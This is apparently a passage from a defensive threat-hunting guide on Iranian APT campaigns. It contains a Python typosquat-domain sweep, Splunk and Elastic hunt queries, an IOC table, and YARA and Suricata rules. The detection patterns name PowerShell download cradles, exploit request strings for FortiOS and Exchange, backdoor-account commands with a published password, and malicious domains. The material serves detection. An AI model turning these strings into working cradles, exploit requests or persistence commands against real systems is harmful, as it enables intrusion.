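MAX_DISTANCE = 2
MIN_BRAND_LEN = 5  # no fuzzy matching for short brands (hp, ge, dell ...)


def levenshtein(a, b):
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(qname):
    """Last two labels of the name; not PSL-aware (assumption)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(qname, iocs=IOC_DOMAINS, brands=BRANDS, max_distance=MAX_DISTANCE):
    """Return (kind, match) or None. Exact IOC hits win; then a brand token
    paired with a lure word; then a token within edit distance of a brand."""
    reg = registrable_domain(qname)
    if reg in iocs:
        return ("ioc", reg)
    tokens = reg.split(".")[0].split("-")
    for token in tokens:
        if token in brands:
            if len(tokens) > 1 and any(t in LURE_WORDS for t in tokens):
                return ("brand_lure", token)
            continue  # the brand's own name on its own is not evidence
        for brand in brands:
            if len(brand) < MIN_BRAND_LEN or abs(len(token) - len(brand)) > max_distance:
                continue
            if levenshtein(token, brand) <= max_distance:
                return ("typosquat", brand)
    return None


# Constructed DNS log lines (not from any real environment).
SAMPLE_DNS_LOG = """\
2026-03-31T10:00:01Z 10.0.0.12 www.washingtonpost.com A
2026-03-31T10:00:05Z 10.0.0.12 login.washinqtonpost.press A
2026-03-31T10:00:09Z 10.0.0.33 micros0ft-verify.net A
2026-03-31T10:00:12Z 10.0.0.33 outlook-verify.net A
2026-03-31T10:00:20Z 10.0.0.7 hyperfilevault1.xyz A
2026-03-31T10:00:25Z 10.0.0.7 cdn.example-corp.internal A
2026-03-31T10:00:30Z 10.0.0.9 gooogle.com A
2026-03-31T10:00:41Z 10.0.0.9 yahoo-login-check.com A
"""


def sweep(log_text):
    """Return (client_ip, qname, kind, match) for every flagged query."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        qname = parts[2].lower().rstrip(".")
        verdict = classify(qname)
        if verdict:
            hits.append((parts[1], qname, verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for hit in sweep(SAMPLE_DNS_LOG):
        print(hit)
```

Two of the eight constructed queries are clean, including the real washingtonpost.com, because a brand name alone is never flagged; the length filter before the distance computation keeps the sweep cheap enough to run over a full day of resolver logs, and the edit-distance threshold is where you tune false positives for your own brand list.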
T1218.010 — Regsvr32 (Defense Evasion) [P2]
APT35/Parisite use Regsvr32 for LOTL execution and DLL proxy loading
Splunk SPL:
index=* (source=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 OR source=WinEventLog:Security EventCode=4688) Image="*\\regsvr32.exe" (CommandLine="*/s*" AND CommandLine="*/n*" AND CommandLine="*/u*" AND CommandLine="*/i:*") AND (CommandLine="*http*" OR CommandLine="*ftp*" OR CommandLine="*file://*") | table _time, Computer, User, CommandLine, ParentCommandLine
Elastic KQL:
(event.code:("1" OR "4688") AND process.name:"regsvr32.exe" AND process.command_line:(*\/s* AND *\/n* AND *\/u* AND *\/i\:*) AND process.command_line:(*http* OR *ftp* OR *file\:\/\/*))
Focus on regsvr32 loading remote payloads via /i: parameter. Check parent process for anomalies.
T1505.003 — Web Shell (Persistence) [P1]
Iranian actors deploy web shells on compromised Exchange and web servers
Splunk SPL:
index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 (TargetFilename="*\\inetpub\\wwwroot\\*" OR TargetFilename="*\\Exchange Server\\*\\FrontEnd\\HttpProxy\\*" OR TargetFilename="*\\Exchange Server\\*\\ClientAccess\\*" OR TargetFilename="*\\owa\\auth\\*") (TargetFilename="*.aspx" OR TargetFilename="*.ashx" OR TargetFilename="*.asmx" OR TargetFilename="*.asp") | stats min(_time) as first_seen values(Image) as writer by Computer, TargetFilename | sort first_seen
Elastic KQL:
(event.code:"11" AND file.path:(*\\inetpub\\wwwroot\\* OR *\\Exchange\\* OR *\\OWA\\*) AND file.name:(*.aspx OR *.ashx OR *.asmx))
Review any new ASPX/ASHX files in web directories. Check for files with suspicious names or recent creation dates. An .aspx written by w3wp.exe (the IIS worker process) or an Exchange service process rather than by a deployment tool is the classic sign of exploitation dropping a shell; once you have the file name, pull the IIS logs (cs-uri-stem) for requests to it to recover the operator's source IP and the first request.
T1190 — Exploit Public-Facing Application (Initial Access) [P1]
PHOSPHORUS targets Fortinet FortiOS SSL VPN and Exchange Servers globally
Splunk SPL:
index=* (sourcetype=fortinet OR sourcetype=iis OR sourcetype=MSExchange*) ("*/remote/fgt_lang?lang=/../*" OR "*sslvpnd.websession*" OR "*/ecp/DDI/DDIService.svc/SetObject*" OR "*/autodiscover/autodiscover.json?@*") | stats count min(_time) as first_seen values(uri_path) as uri_path by src_ip, dest | sort first_seen
Elastic KQL:
(url.original:(*sslvpnd.websession* OR */ecp/DDI/DDIService.svc/SetObject* OR */autodiscover/autodiscover.json\?@*) OR (url.path:"/remote/fgt_lang" AND url.query:*lang=/../*))
Patch Fortinet and Exchange immediately and monitor for exploitation attempts even if patched. These request shapes are the CVE-2018-13379 path traversal (a lang= parameter walking up to sslvpnd.websession) and the ProxyLogon/ProxyShell exploit chains against Exchange (the DDIService.svc/SetObject write-back and the autodiscover.json?@ path-confusion prefix). A single matching request from an external address is worth a look, so no count threshold is applied; CVE identifiers never appear in the logs themselves, which is why the hunt keys on request strings. Field names follow the Splunk CIM Web model and Elastic ECS; adjust to your own.
T1486 — Data Encrypted for Impact (Impact) [P1]
PHOSPHORUS deploys BitLocker for ransomware on compromised networks
Splunk SPL:
index=* (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 OR source="WinEventLog:Security" EventCode=4688) (Image="*\\manage-bde.exe" OR CommandLine="*manage-bde*" OR CommandLine="*Enable-BitLocker*" OR CommandLine="*Add-BitLockerKeyProtector*" OR CommandLine="*Remove-BitLockerKeyProtector*" OR CommandLine="*-protectors -add*" OR CommandLine="*-protectors -delete*") | table _time, Computer, User, ParentImage, CommandLine
Elastic KQL:
(event.code:("1" OR "4688") AND (process.name:"manage-bde.exe" OR process.command_line:(*manage\-bde* OR *Enable\-BitLocker* OR *BitLockerKeyProtector* OR *\-protectors*)))
Alert on any unexpected BitLocker operations, especially deletion of recovery keys or forced encryption of data volumes. Process auditing is the right source for this (the object-access audit 4663 does not record command lines); the Microsoft-Windows-BitLocker-API/Management log records encryption start and stop independently of process auditing and is worth forwarding as a second signal.
T1071.001 — Web Protocols (Command and Control) [P2]
Iranian C2 uses Telegram API and blockchain-based domain generation
Splunk SPL:
index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="*api.telegram.org*" OR url="*api.telegram.org*" OR query="*.bit" OR query="*.eth" OR query="*.crypto" OR url="*.bit" OR url="*.eth" OR url="*.crypto") NOT user="telegram_bot_service" | stats count by src_ip, dest_ip, query, url | where count > 5
Elastic KQL:
(dns.question.name:(*api.telegram.org* OR *.bit OR *.eth OR *.crypto) OR url.domain:(*api.telegram.org* OR *.bit OR *.eth OR *.crypto)) AND NOT user.name:"telegram_bot_service"
Baseline legitimate Telegram usage. Alert on blockchain DNS queries from servers: standard resolvers return NXDOMAIN for .bit, .eth and .crypto, so any such query from a server is anomalous on its own, and malware that actually resolves them does so through public gateways (for ENS, names under eth.limo) or its own resolver, which is the traffic to look for next.
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| domain | handala-hack.to | MOIS-controlled domain seized by DOJ, used for claiming the Stryker attack |
| domain | handala-redwanted.to | MOIS-controlled domain for posting PII of Israeli officials |
| domain | justicehomeland.org | Shell hacktivist entity domain linked to Handala |
| domain | karmabelow80.org | Shell hacktivist entity domain linked to Handala |
| domain | hyperfilevault1.xyz | Phishing campaign scam domain exploiting conflict theme |
| domain | iranforward.org | Scam site requesting humanitarian donations |
| domain | trumpvsirancoin.xyz | Scam domain exploiting conflict theme |
| domain | washinqtonpost.press | APT42 typo-squatted phishing domain mimicking the Washington Post |
| domain | panel-live-check.online | APT42 credential harvesting infrastructure |
| domain | outlook-verify.net | Credential harvesting phishing domain disrupted by Microsoft |
| domain | yahoo-verify.net | Credential harvesting phishing domain disrupted by Microsoft |
| domain | verification-live.com | Credential harvesting phishing domain disrupted by Microsoft |
| domain | myaccount-services.net | Credential harvesting phishing domain disrupted by Microsoft |
| email | Handala_Team@outlook.com | Email account used by Handala to send death threats to Iranian dissidents |
| malware | PowerLess | Custom PowerShell backdoor used by APT35 (Charming Kitten, also tracked as Magic Hound); the name is a vendor label and rarely appears in artifacts |
IOC Sweep Queries (Splunk):
Domain IOCs (one query; the raw terms prefilter the index, the regex anchors on label boundaries so that nothandala-hack.to does not match; query, dest and url are CIM field names, adjust to your TA):
index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (handala-hack.to OR handala-redwanted.to OR justicehomeland.org OR karmabelow80.org OR hyperfilevault1.xyz OR iranforward.org OR trumpvsirancoin.xyz OR washinqtonpost.press OR panel-live-check.online OR outlook-verify.net OR yahoo-verify.net OR verification-live.com OR myaccount-services.net) | eval indicator=coalesce(query, dest, url) | regex indicator="(^|[./@])(handala-hack\.to|handala-redwanted\.to|justicehomeland\.org|karmabelow80\.org|hyperfilevault1\.xyz|iranforward\.org|trumpvsirancoin\.xyz|washinqtonpost\.press|panel-live-check\.online|outlook-verify\.net|yahoo-verify\.net|verification-live\.com|myaccount-services\.net)([/:?]|$)" | table _time, sourcetype, src_ip, user, indicator
Email IOC:
index=* (sourcetype=email OR sourcetype=msgtrack) (sender="Handala_Team@outlook.com" OR from="Handala_Team@outlook.com" OR recipient="Handala_Team@outlook.com" OR to="Handala_Team@outlook.com") | table _time, sender, recipient, subject
Malware name (weak: PowerLess is a vendor label for the backdoor and seldom appears on disk or in command lines; Magic Hound is an alias of APT35, not a file, so there is nothing to search for under that name; rely on the T1059.001 hunt above for the actual behaviour):
index=* (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 OR source="WinEventLog:Security" EventCode=4688) (CommandLine="*PowerLess*" OR Image="*PowerLess*" OR OriginalFileName="*PowerLess*") | table _time, Computer, User, CommandLine, Image
YARA Rules
APT35_PowerLess_Backdoor — Heuristic for PowerShell download-and-execute loaders of the kind used by APT35 (Charming Kitten / Magic Hound) for PowerLess; the name string is a weak hint, the cradle combination is the real signal
rule APT35_PowerLess_Backdoor {
    meta:
        description = "Detects PowerShell download cradles of the kind used by the APT35 PowerLess backdoor"
        author = "Threat Hunt Team"
        date = "2024-01-01"
        reference = "Iranian APT Campaign"
    strings:
        $name = "PowerLess" ascii wide nocase
        $ps2 = "Invoke-Expression" ascii wide nocase
        $ps3 = "DownloadString" ascii wide nocase
        $ps4 = "System.Net.WebClient" ascii wide nocase
        $ps5 = "FromBase64String" ascii wide nocase
        $cmd1 = "-EncodedCommand" ascii wide nocase
        $cmd2 = "-enc " ascii wide nocase
    condition:
        filesize < 2MB and (
            ($name and any of ($ps2, $ps3, $ps4, $ps5)) or
            (2 of ($ps2, $ps3, $ps4, $ps5) and any of ($cmd1, $cmd2))
        )
}
PHOSPHORUS_Persistence_Indicators — Detects the PHOSPHORUS/APT35 'help' local admin creation in scripts, batch files, command-line captures or memory dumps
rule PHOSPHORUS_Persistence_Indicators {
    meta:
        description = "Detects PHOSPHORUS persistence: the help local admin and its published password"
        author = "Threat Hunt Team"
        date = "2024-01-01"
        reference = "PHOSPHORUS Creates Local Admin"
    strings:
        $pass1 = "_AS_@1394" ascii wide
        $cmd1 = "net user help " ascii wide nocase
        $cmd2 = "net localgroup administrators help" ascii wide nocase
        $reg1 = "SAM\\Domains\\Account\\Users\\Names\\help" ascii wide nocase
    condition:
        $pass1 or any of ($cmd1, $cmd2) or $reg1
}
The bare string "help" is not used on its own: it occurs in almost every binary and would make the rule fire everywhere. The password is specific enough to stand alone, and the net commands match the way the account is actually created.
Suricata Rules
SID 1000001 — Detects DNS queries to Handala MOIS infrastructure (local rule; the msg uses a LOCAL prefix because these are not Emerging Threats signatures)
alert dns any any -> any 53 (msg:"LOCAL Handala MOIS DNS Query Detected"; dns.query; content:"handala-hack.to"; nocase; endswith; classtype:trojan-activity; sid:1000001; rev:1;)
SID 1000002 — Detects DNS queries to APT42 credential harvesting domains
alert dns any any -> any 53 (msg:"LOCAL APT42 Credential Harvesting Domain"; dns.query; content:"panel-live-check.online"; nocase; endswith; classtype:trojan-activity; sid:1000002; rev:1;)
SID 1000003 — Detects HTTP traffic to Iranian phishing domains
alert http any any -> any any (msg:"LOCAL Iranian APT Phishing Domain in HTTP"; flow:established,to_server; http.host; content:"outlook-verify.net"; nocase; classtype:trojan-activity; sid:1000003; rev:1;)
SID 1000004 — Detects Telegram C2 communication patterns (rate-limited to one alert per source every five minutes; tune the source range to servers that have no business talking to Telegram)
alert tls any any -> any 443 (msg:"LOCAL Possible Iranian APT Telegram C2"; flow:established,to_server; tls.sni; content:"api.telegram.org"; threshold: type limit, track by_src, seconds 300, count 1; classtype:trojan-activity; sid:1000004; rev:1;)
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| Sysmon | T1059.001, T1136.001, T1218.010, T1505.003, T1486 | EventID 1 (Process Creation) and EventID 11 (File Creation) are critical |
| Windows Security | T1059.001, T1136.001, T1110.003, T1218.010, T1505.003, T1486 | EventIDs 4688, 4720, 4722, 4732, 4625, 4663 required |
| PowerShell Logging | T1059.001 | ScriptBlock logging (EventID 4104) must be enabled |
| DNS Logs | T1566.002, T1071.001 | Full DNS query logging required for IOC detection |
| Proxy Logs | T1566.002, T1071.001 | URL categorization and full URL logging needed |
| Azure AD/EntraID Logs | T1110.003 | SignInLogs with MFA status codes required |
| IIS Logs | T1505.003, T1190 | W3C extended format with cs-uri-stem and sc-status |
| Exchange Logs | T1190 | ECP, OWA, and PowerShell virtual directory logs |
| Fortinet Logs | T1190 | SSL VPN logs with source IP and authentication status |
Sources
- CNN - Day 32 of Middle East conflict: Iran threatens US tech companies
- Foreign Policy - Iran Threatens U.S. Tech Companies After Hegseth Warns
- CBS News - Iran says major U.S. tech firms are targets
- Palo Alto Networks Unit 42 - Threat Brief: March 2026 Escalation
- DOJ - Justice Department Disrupts Iranian Cyber Operations
- Trellix - The Iranian Cyber Capability 2026
- CISA - Iranian Actors Brute Force Activity AA24-290A
- CISA - Iran-based Actors Enabling Ransomware AA24-241A
- Darktrace - APT35 Charming Kitten Pre-Infected Environment
- Google Cloud - Uncharmed: Untangling Iran's APT42
- Microsoft - Evolving trends in Iranian threat actor activity
- Infosecurity - Microsoft Disruption of Iranian APT
- Gatewatcher - Charming Kitten Operations Revealed
- Cyber Defence - Charming Kitten APT35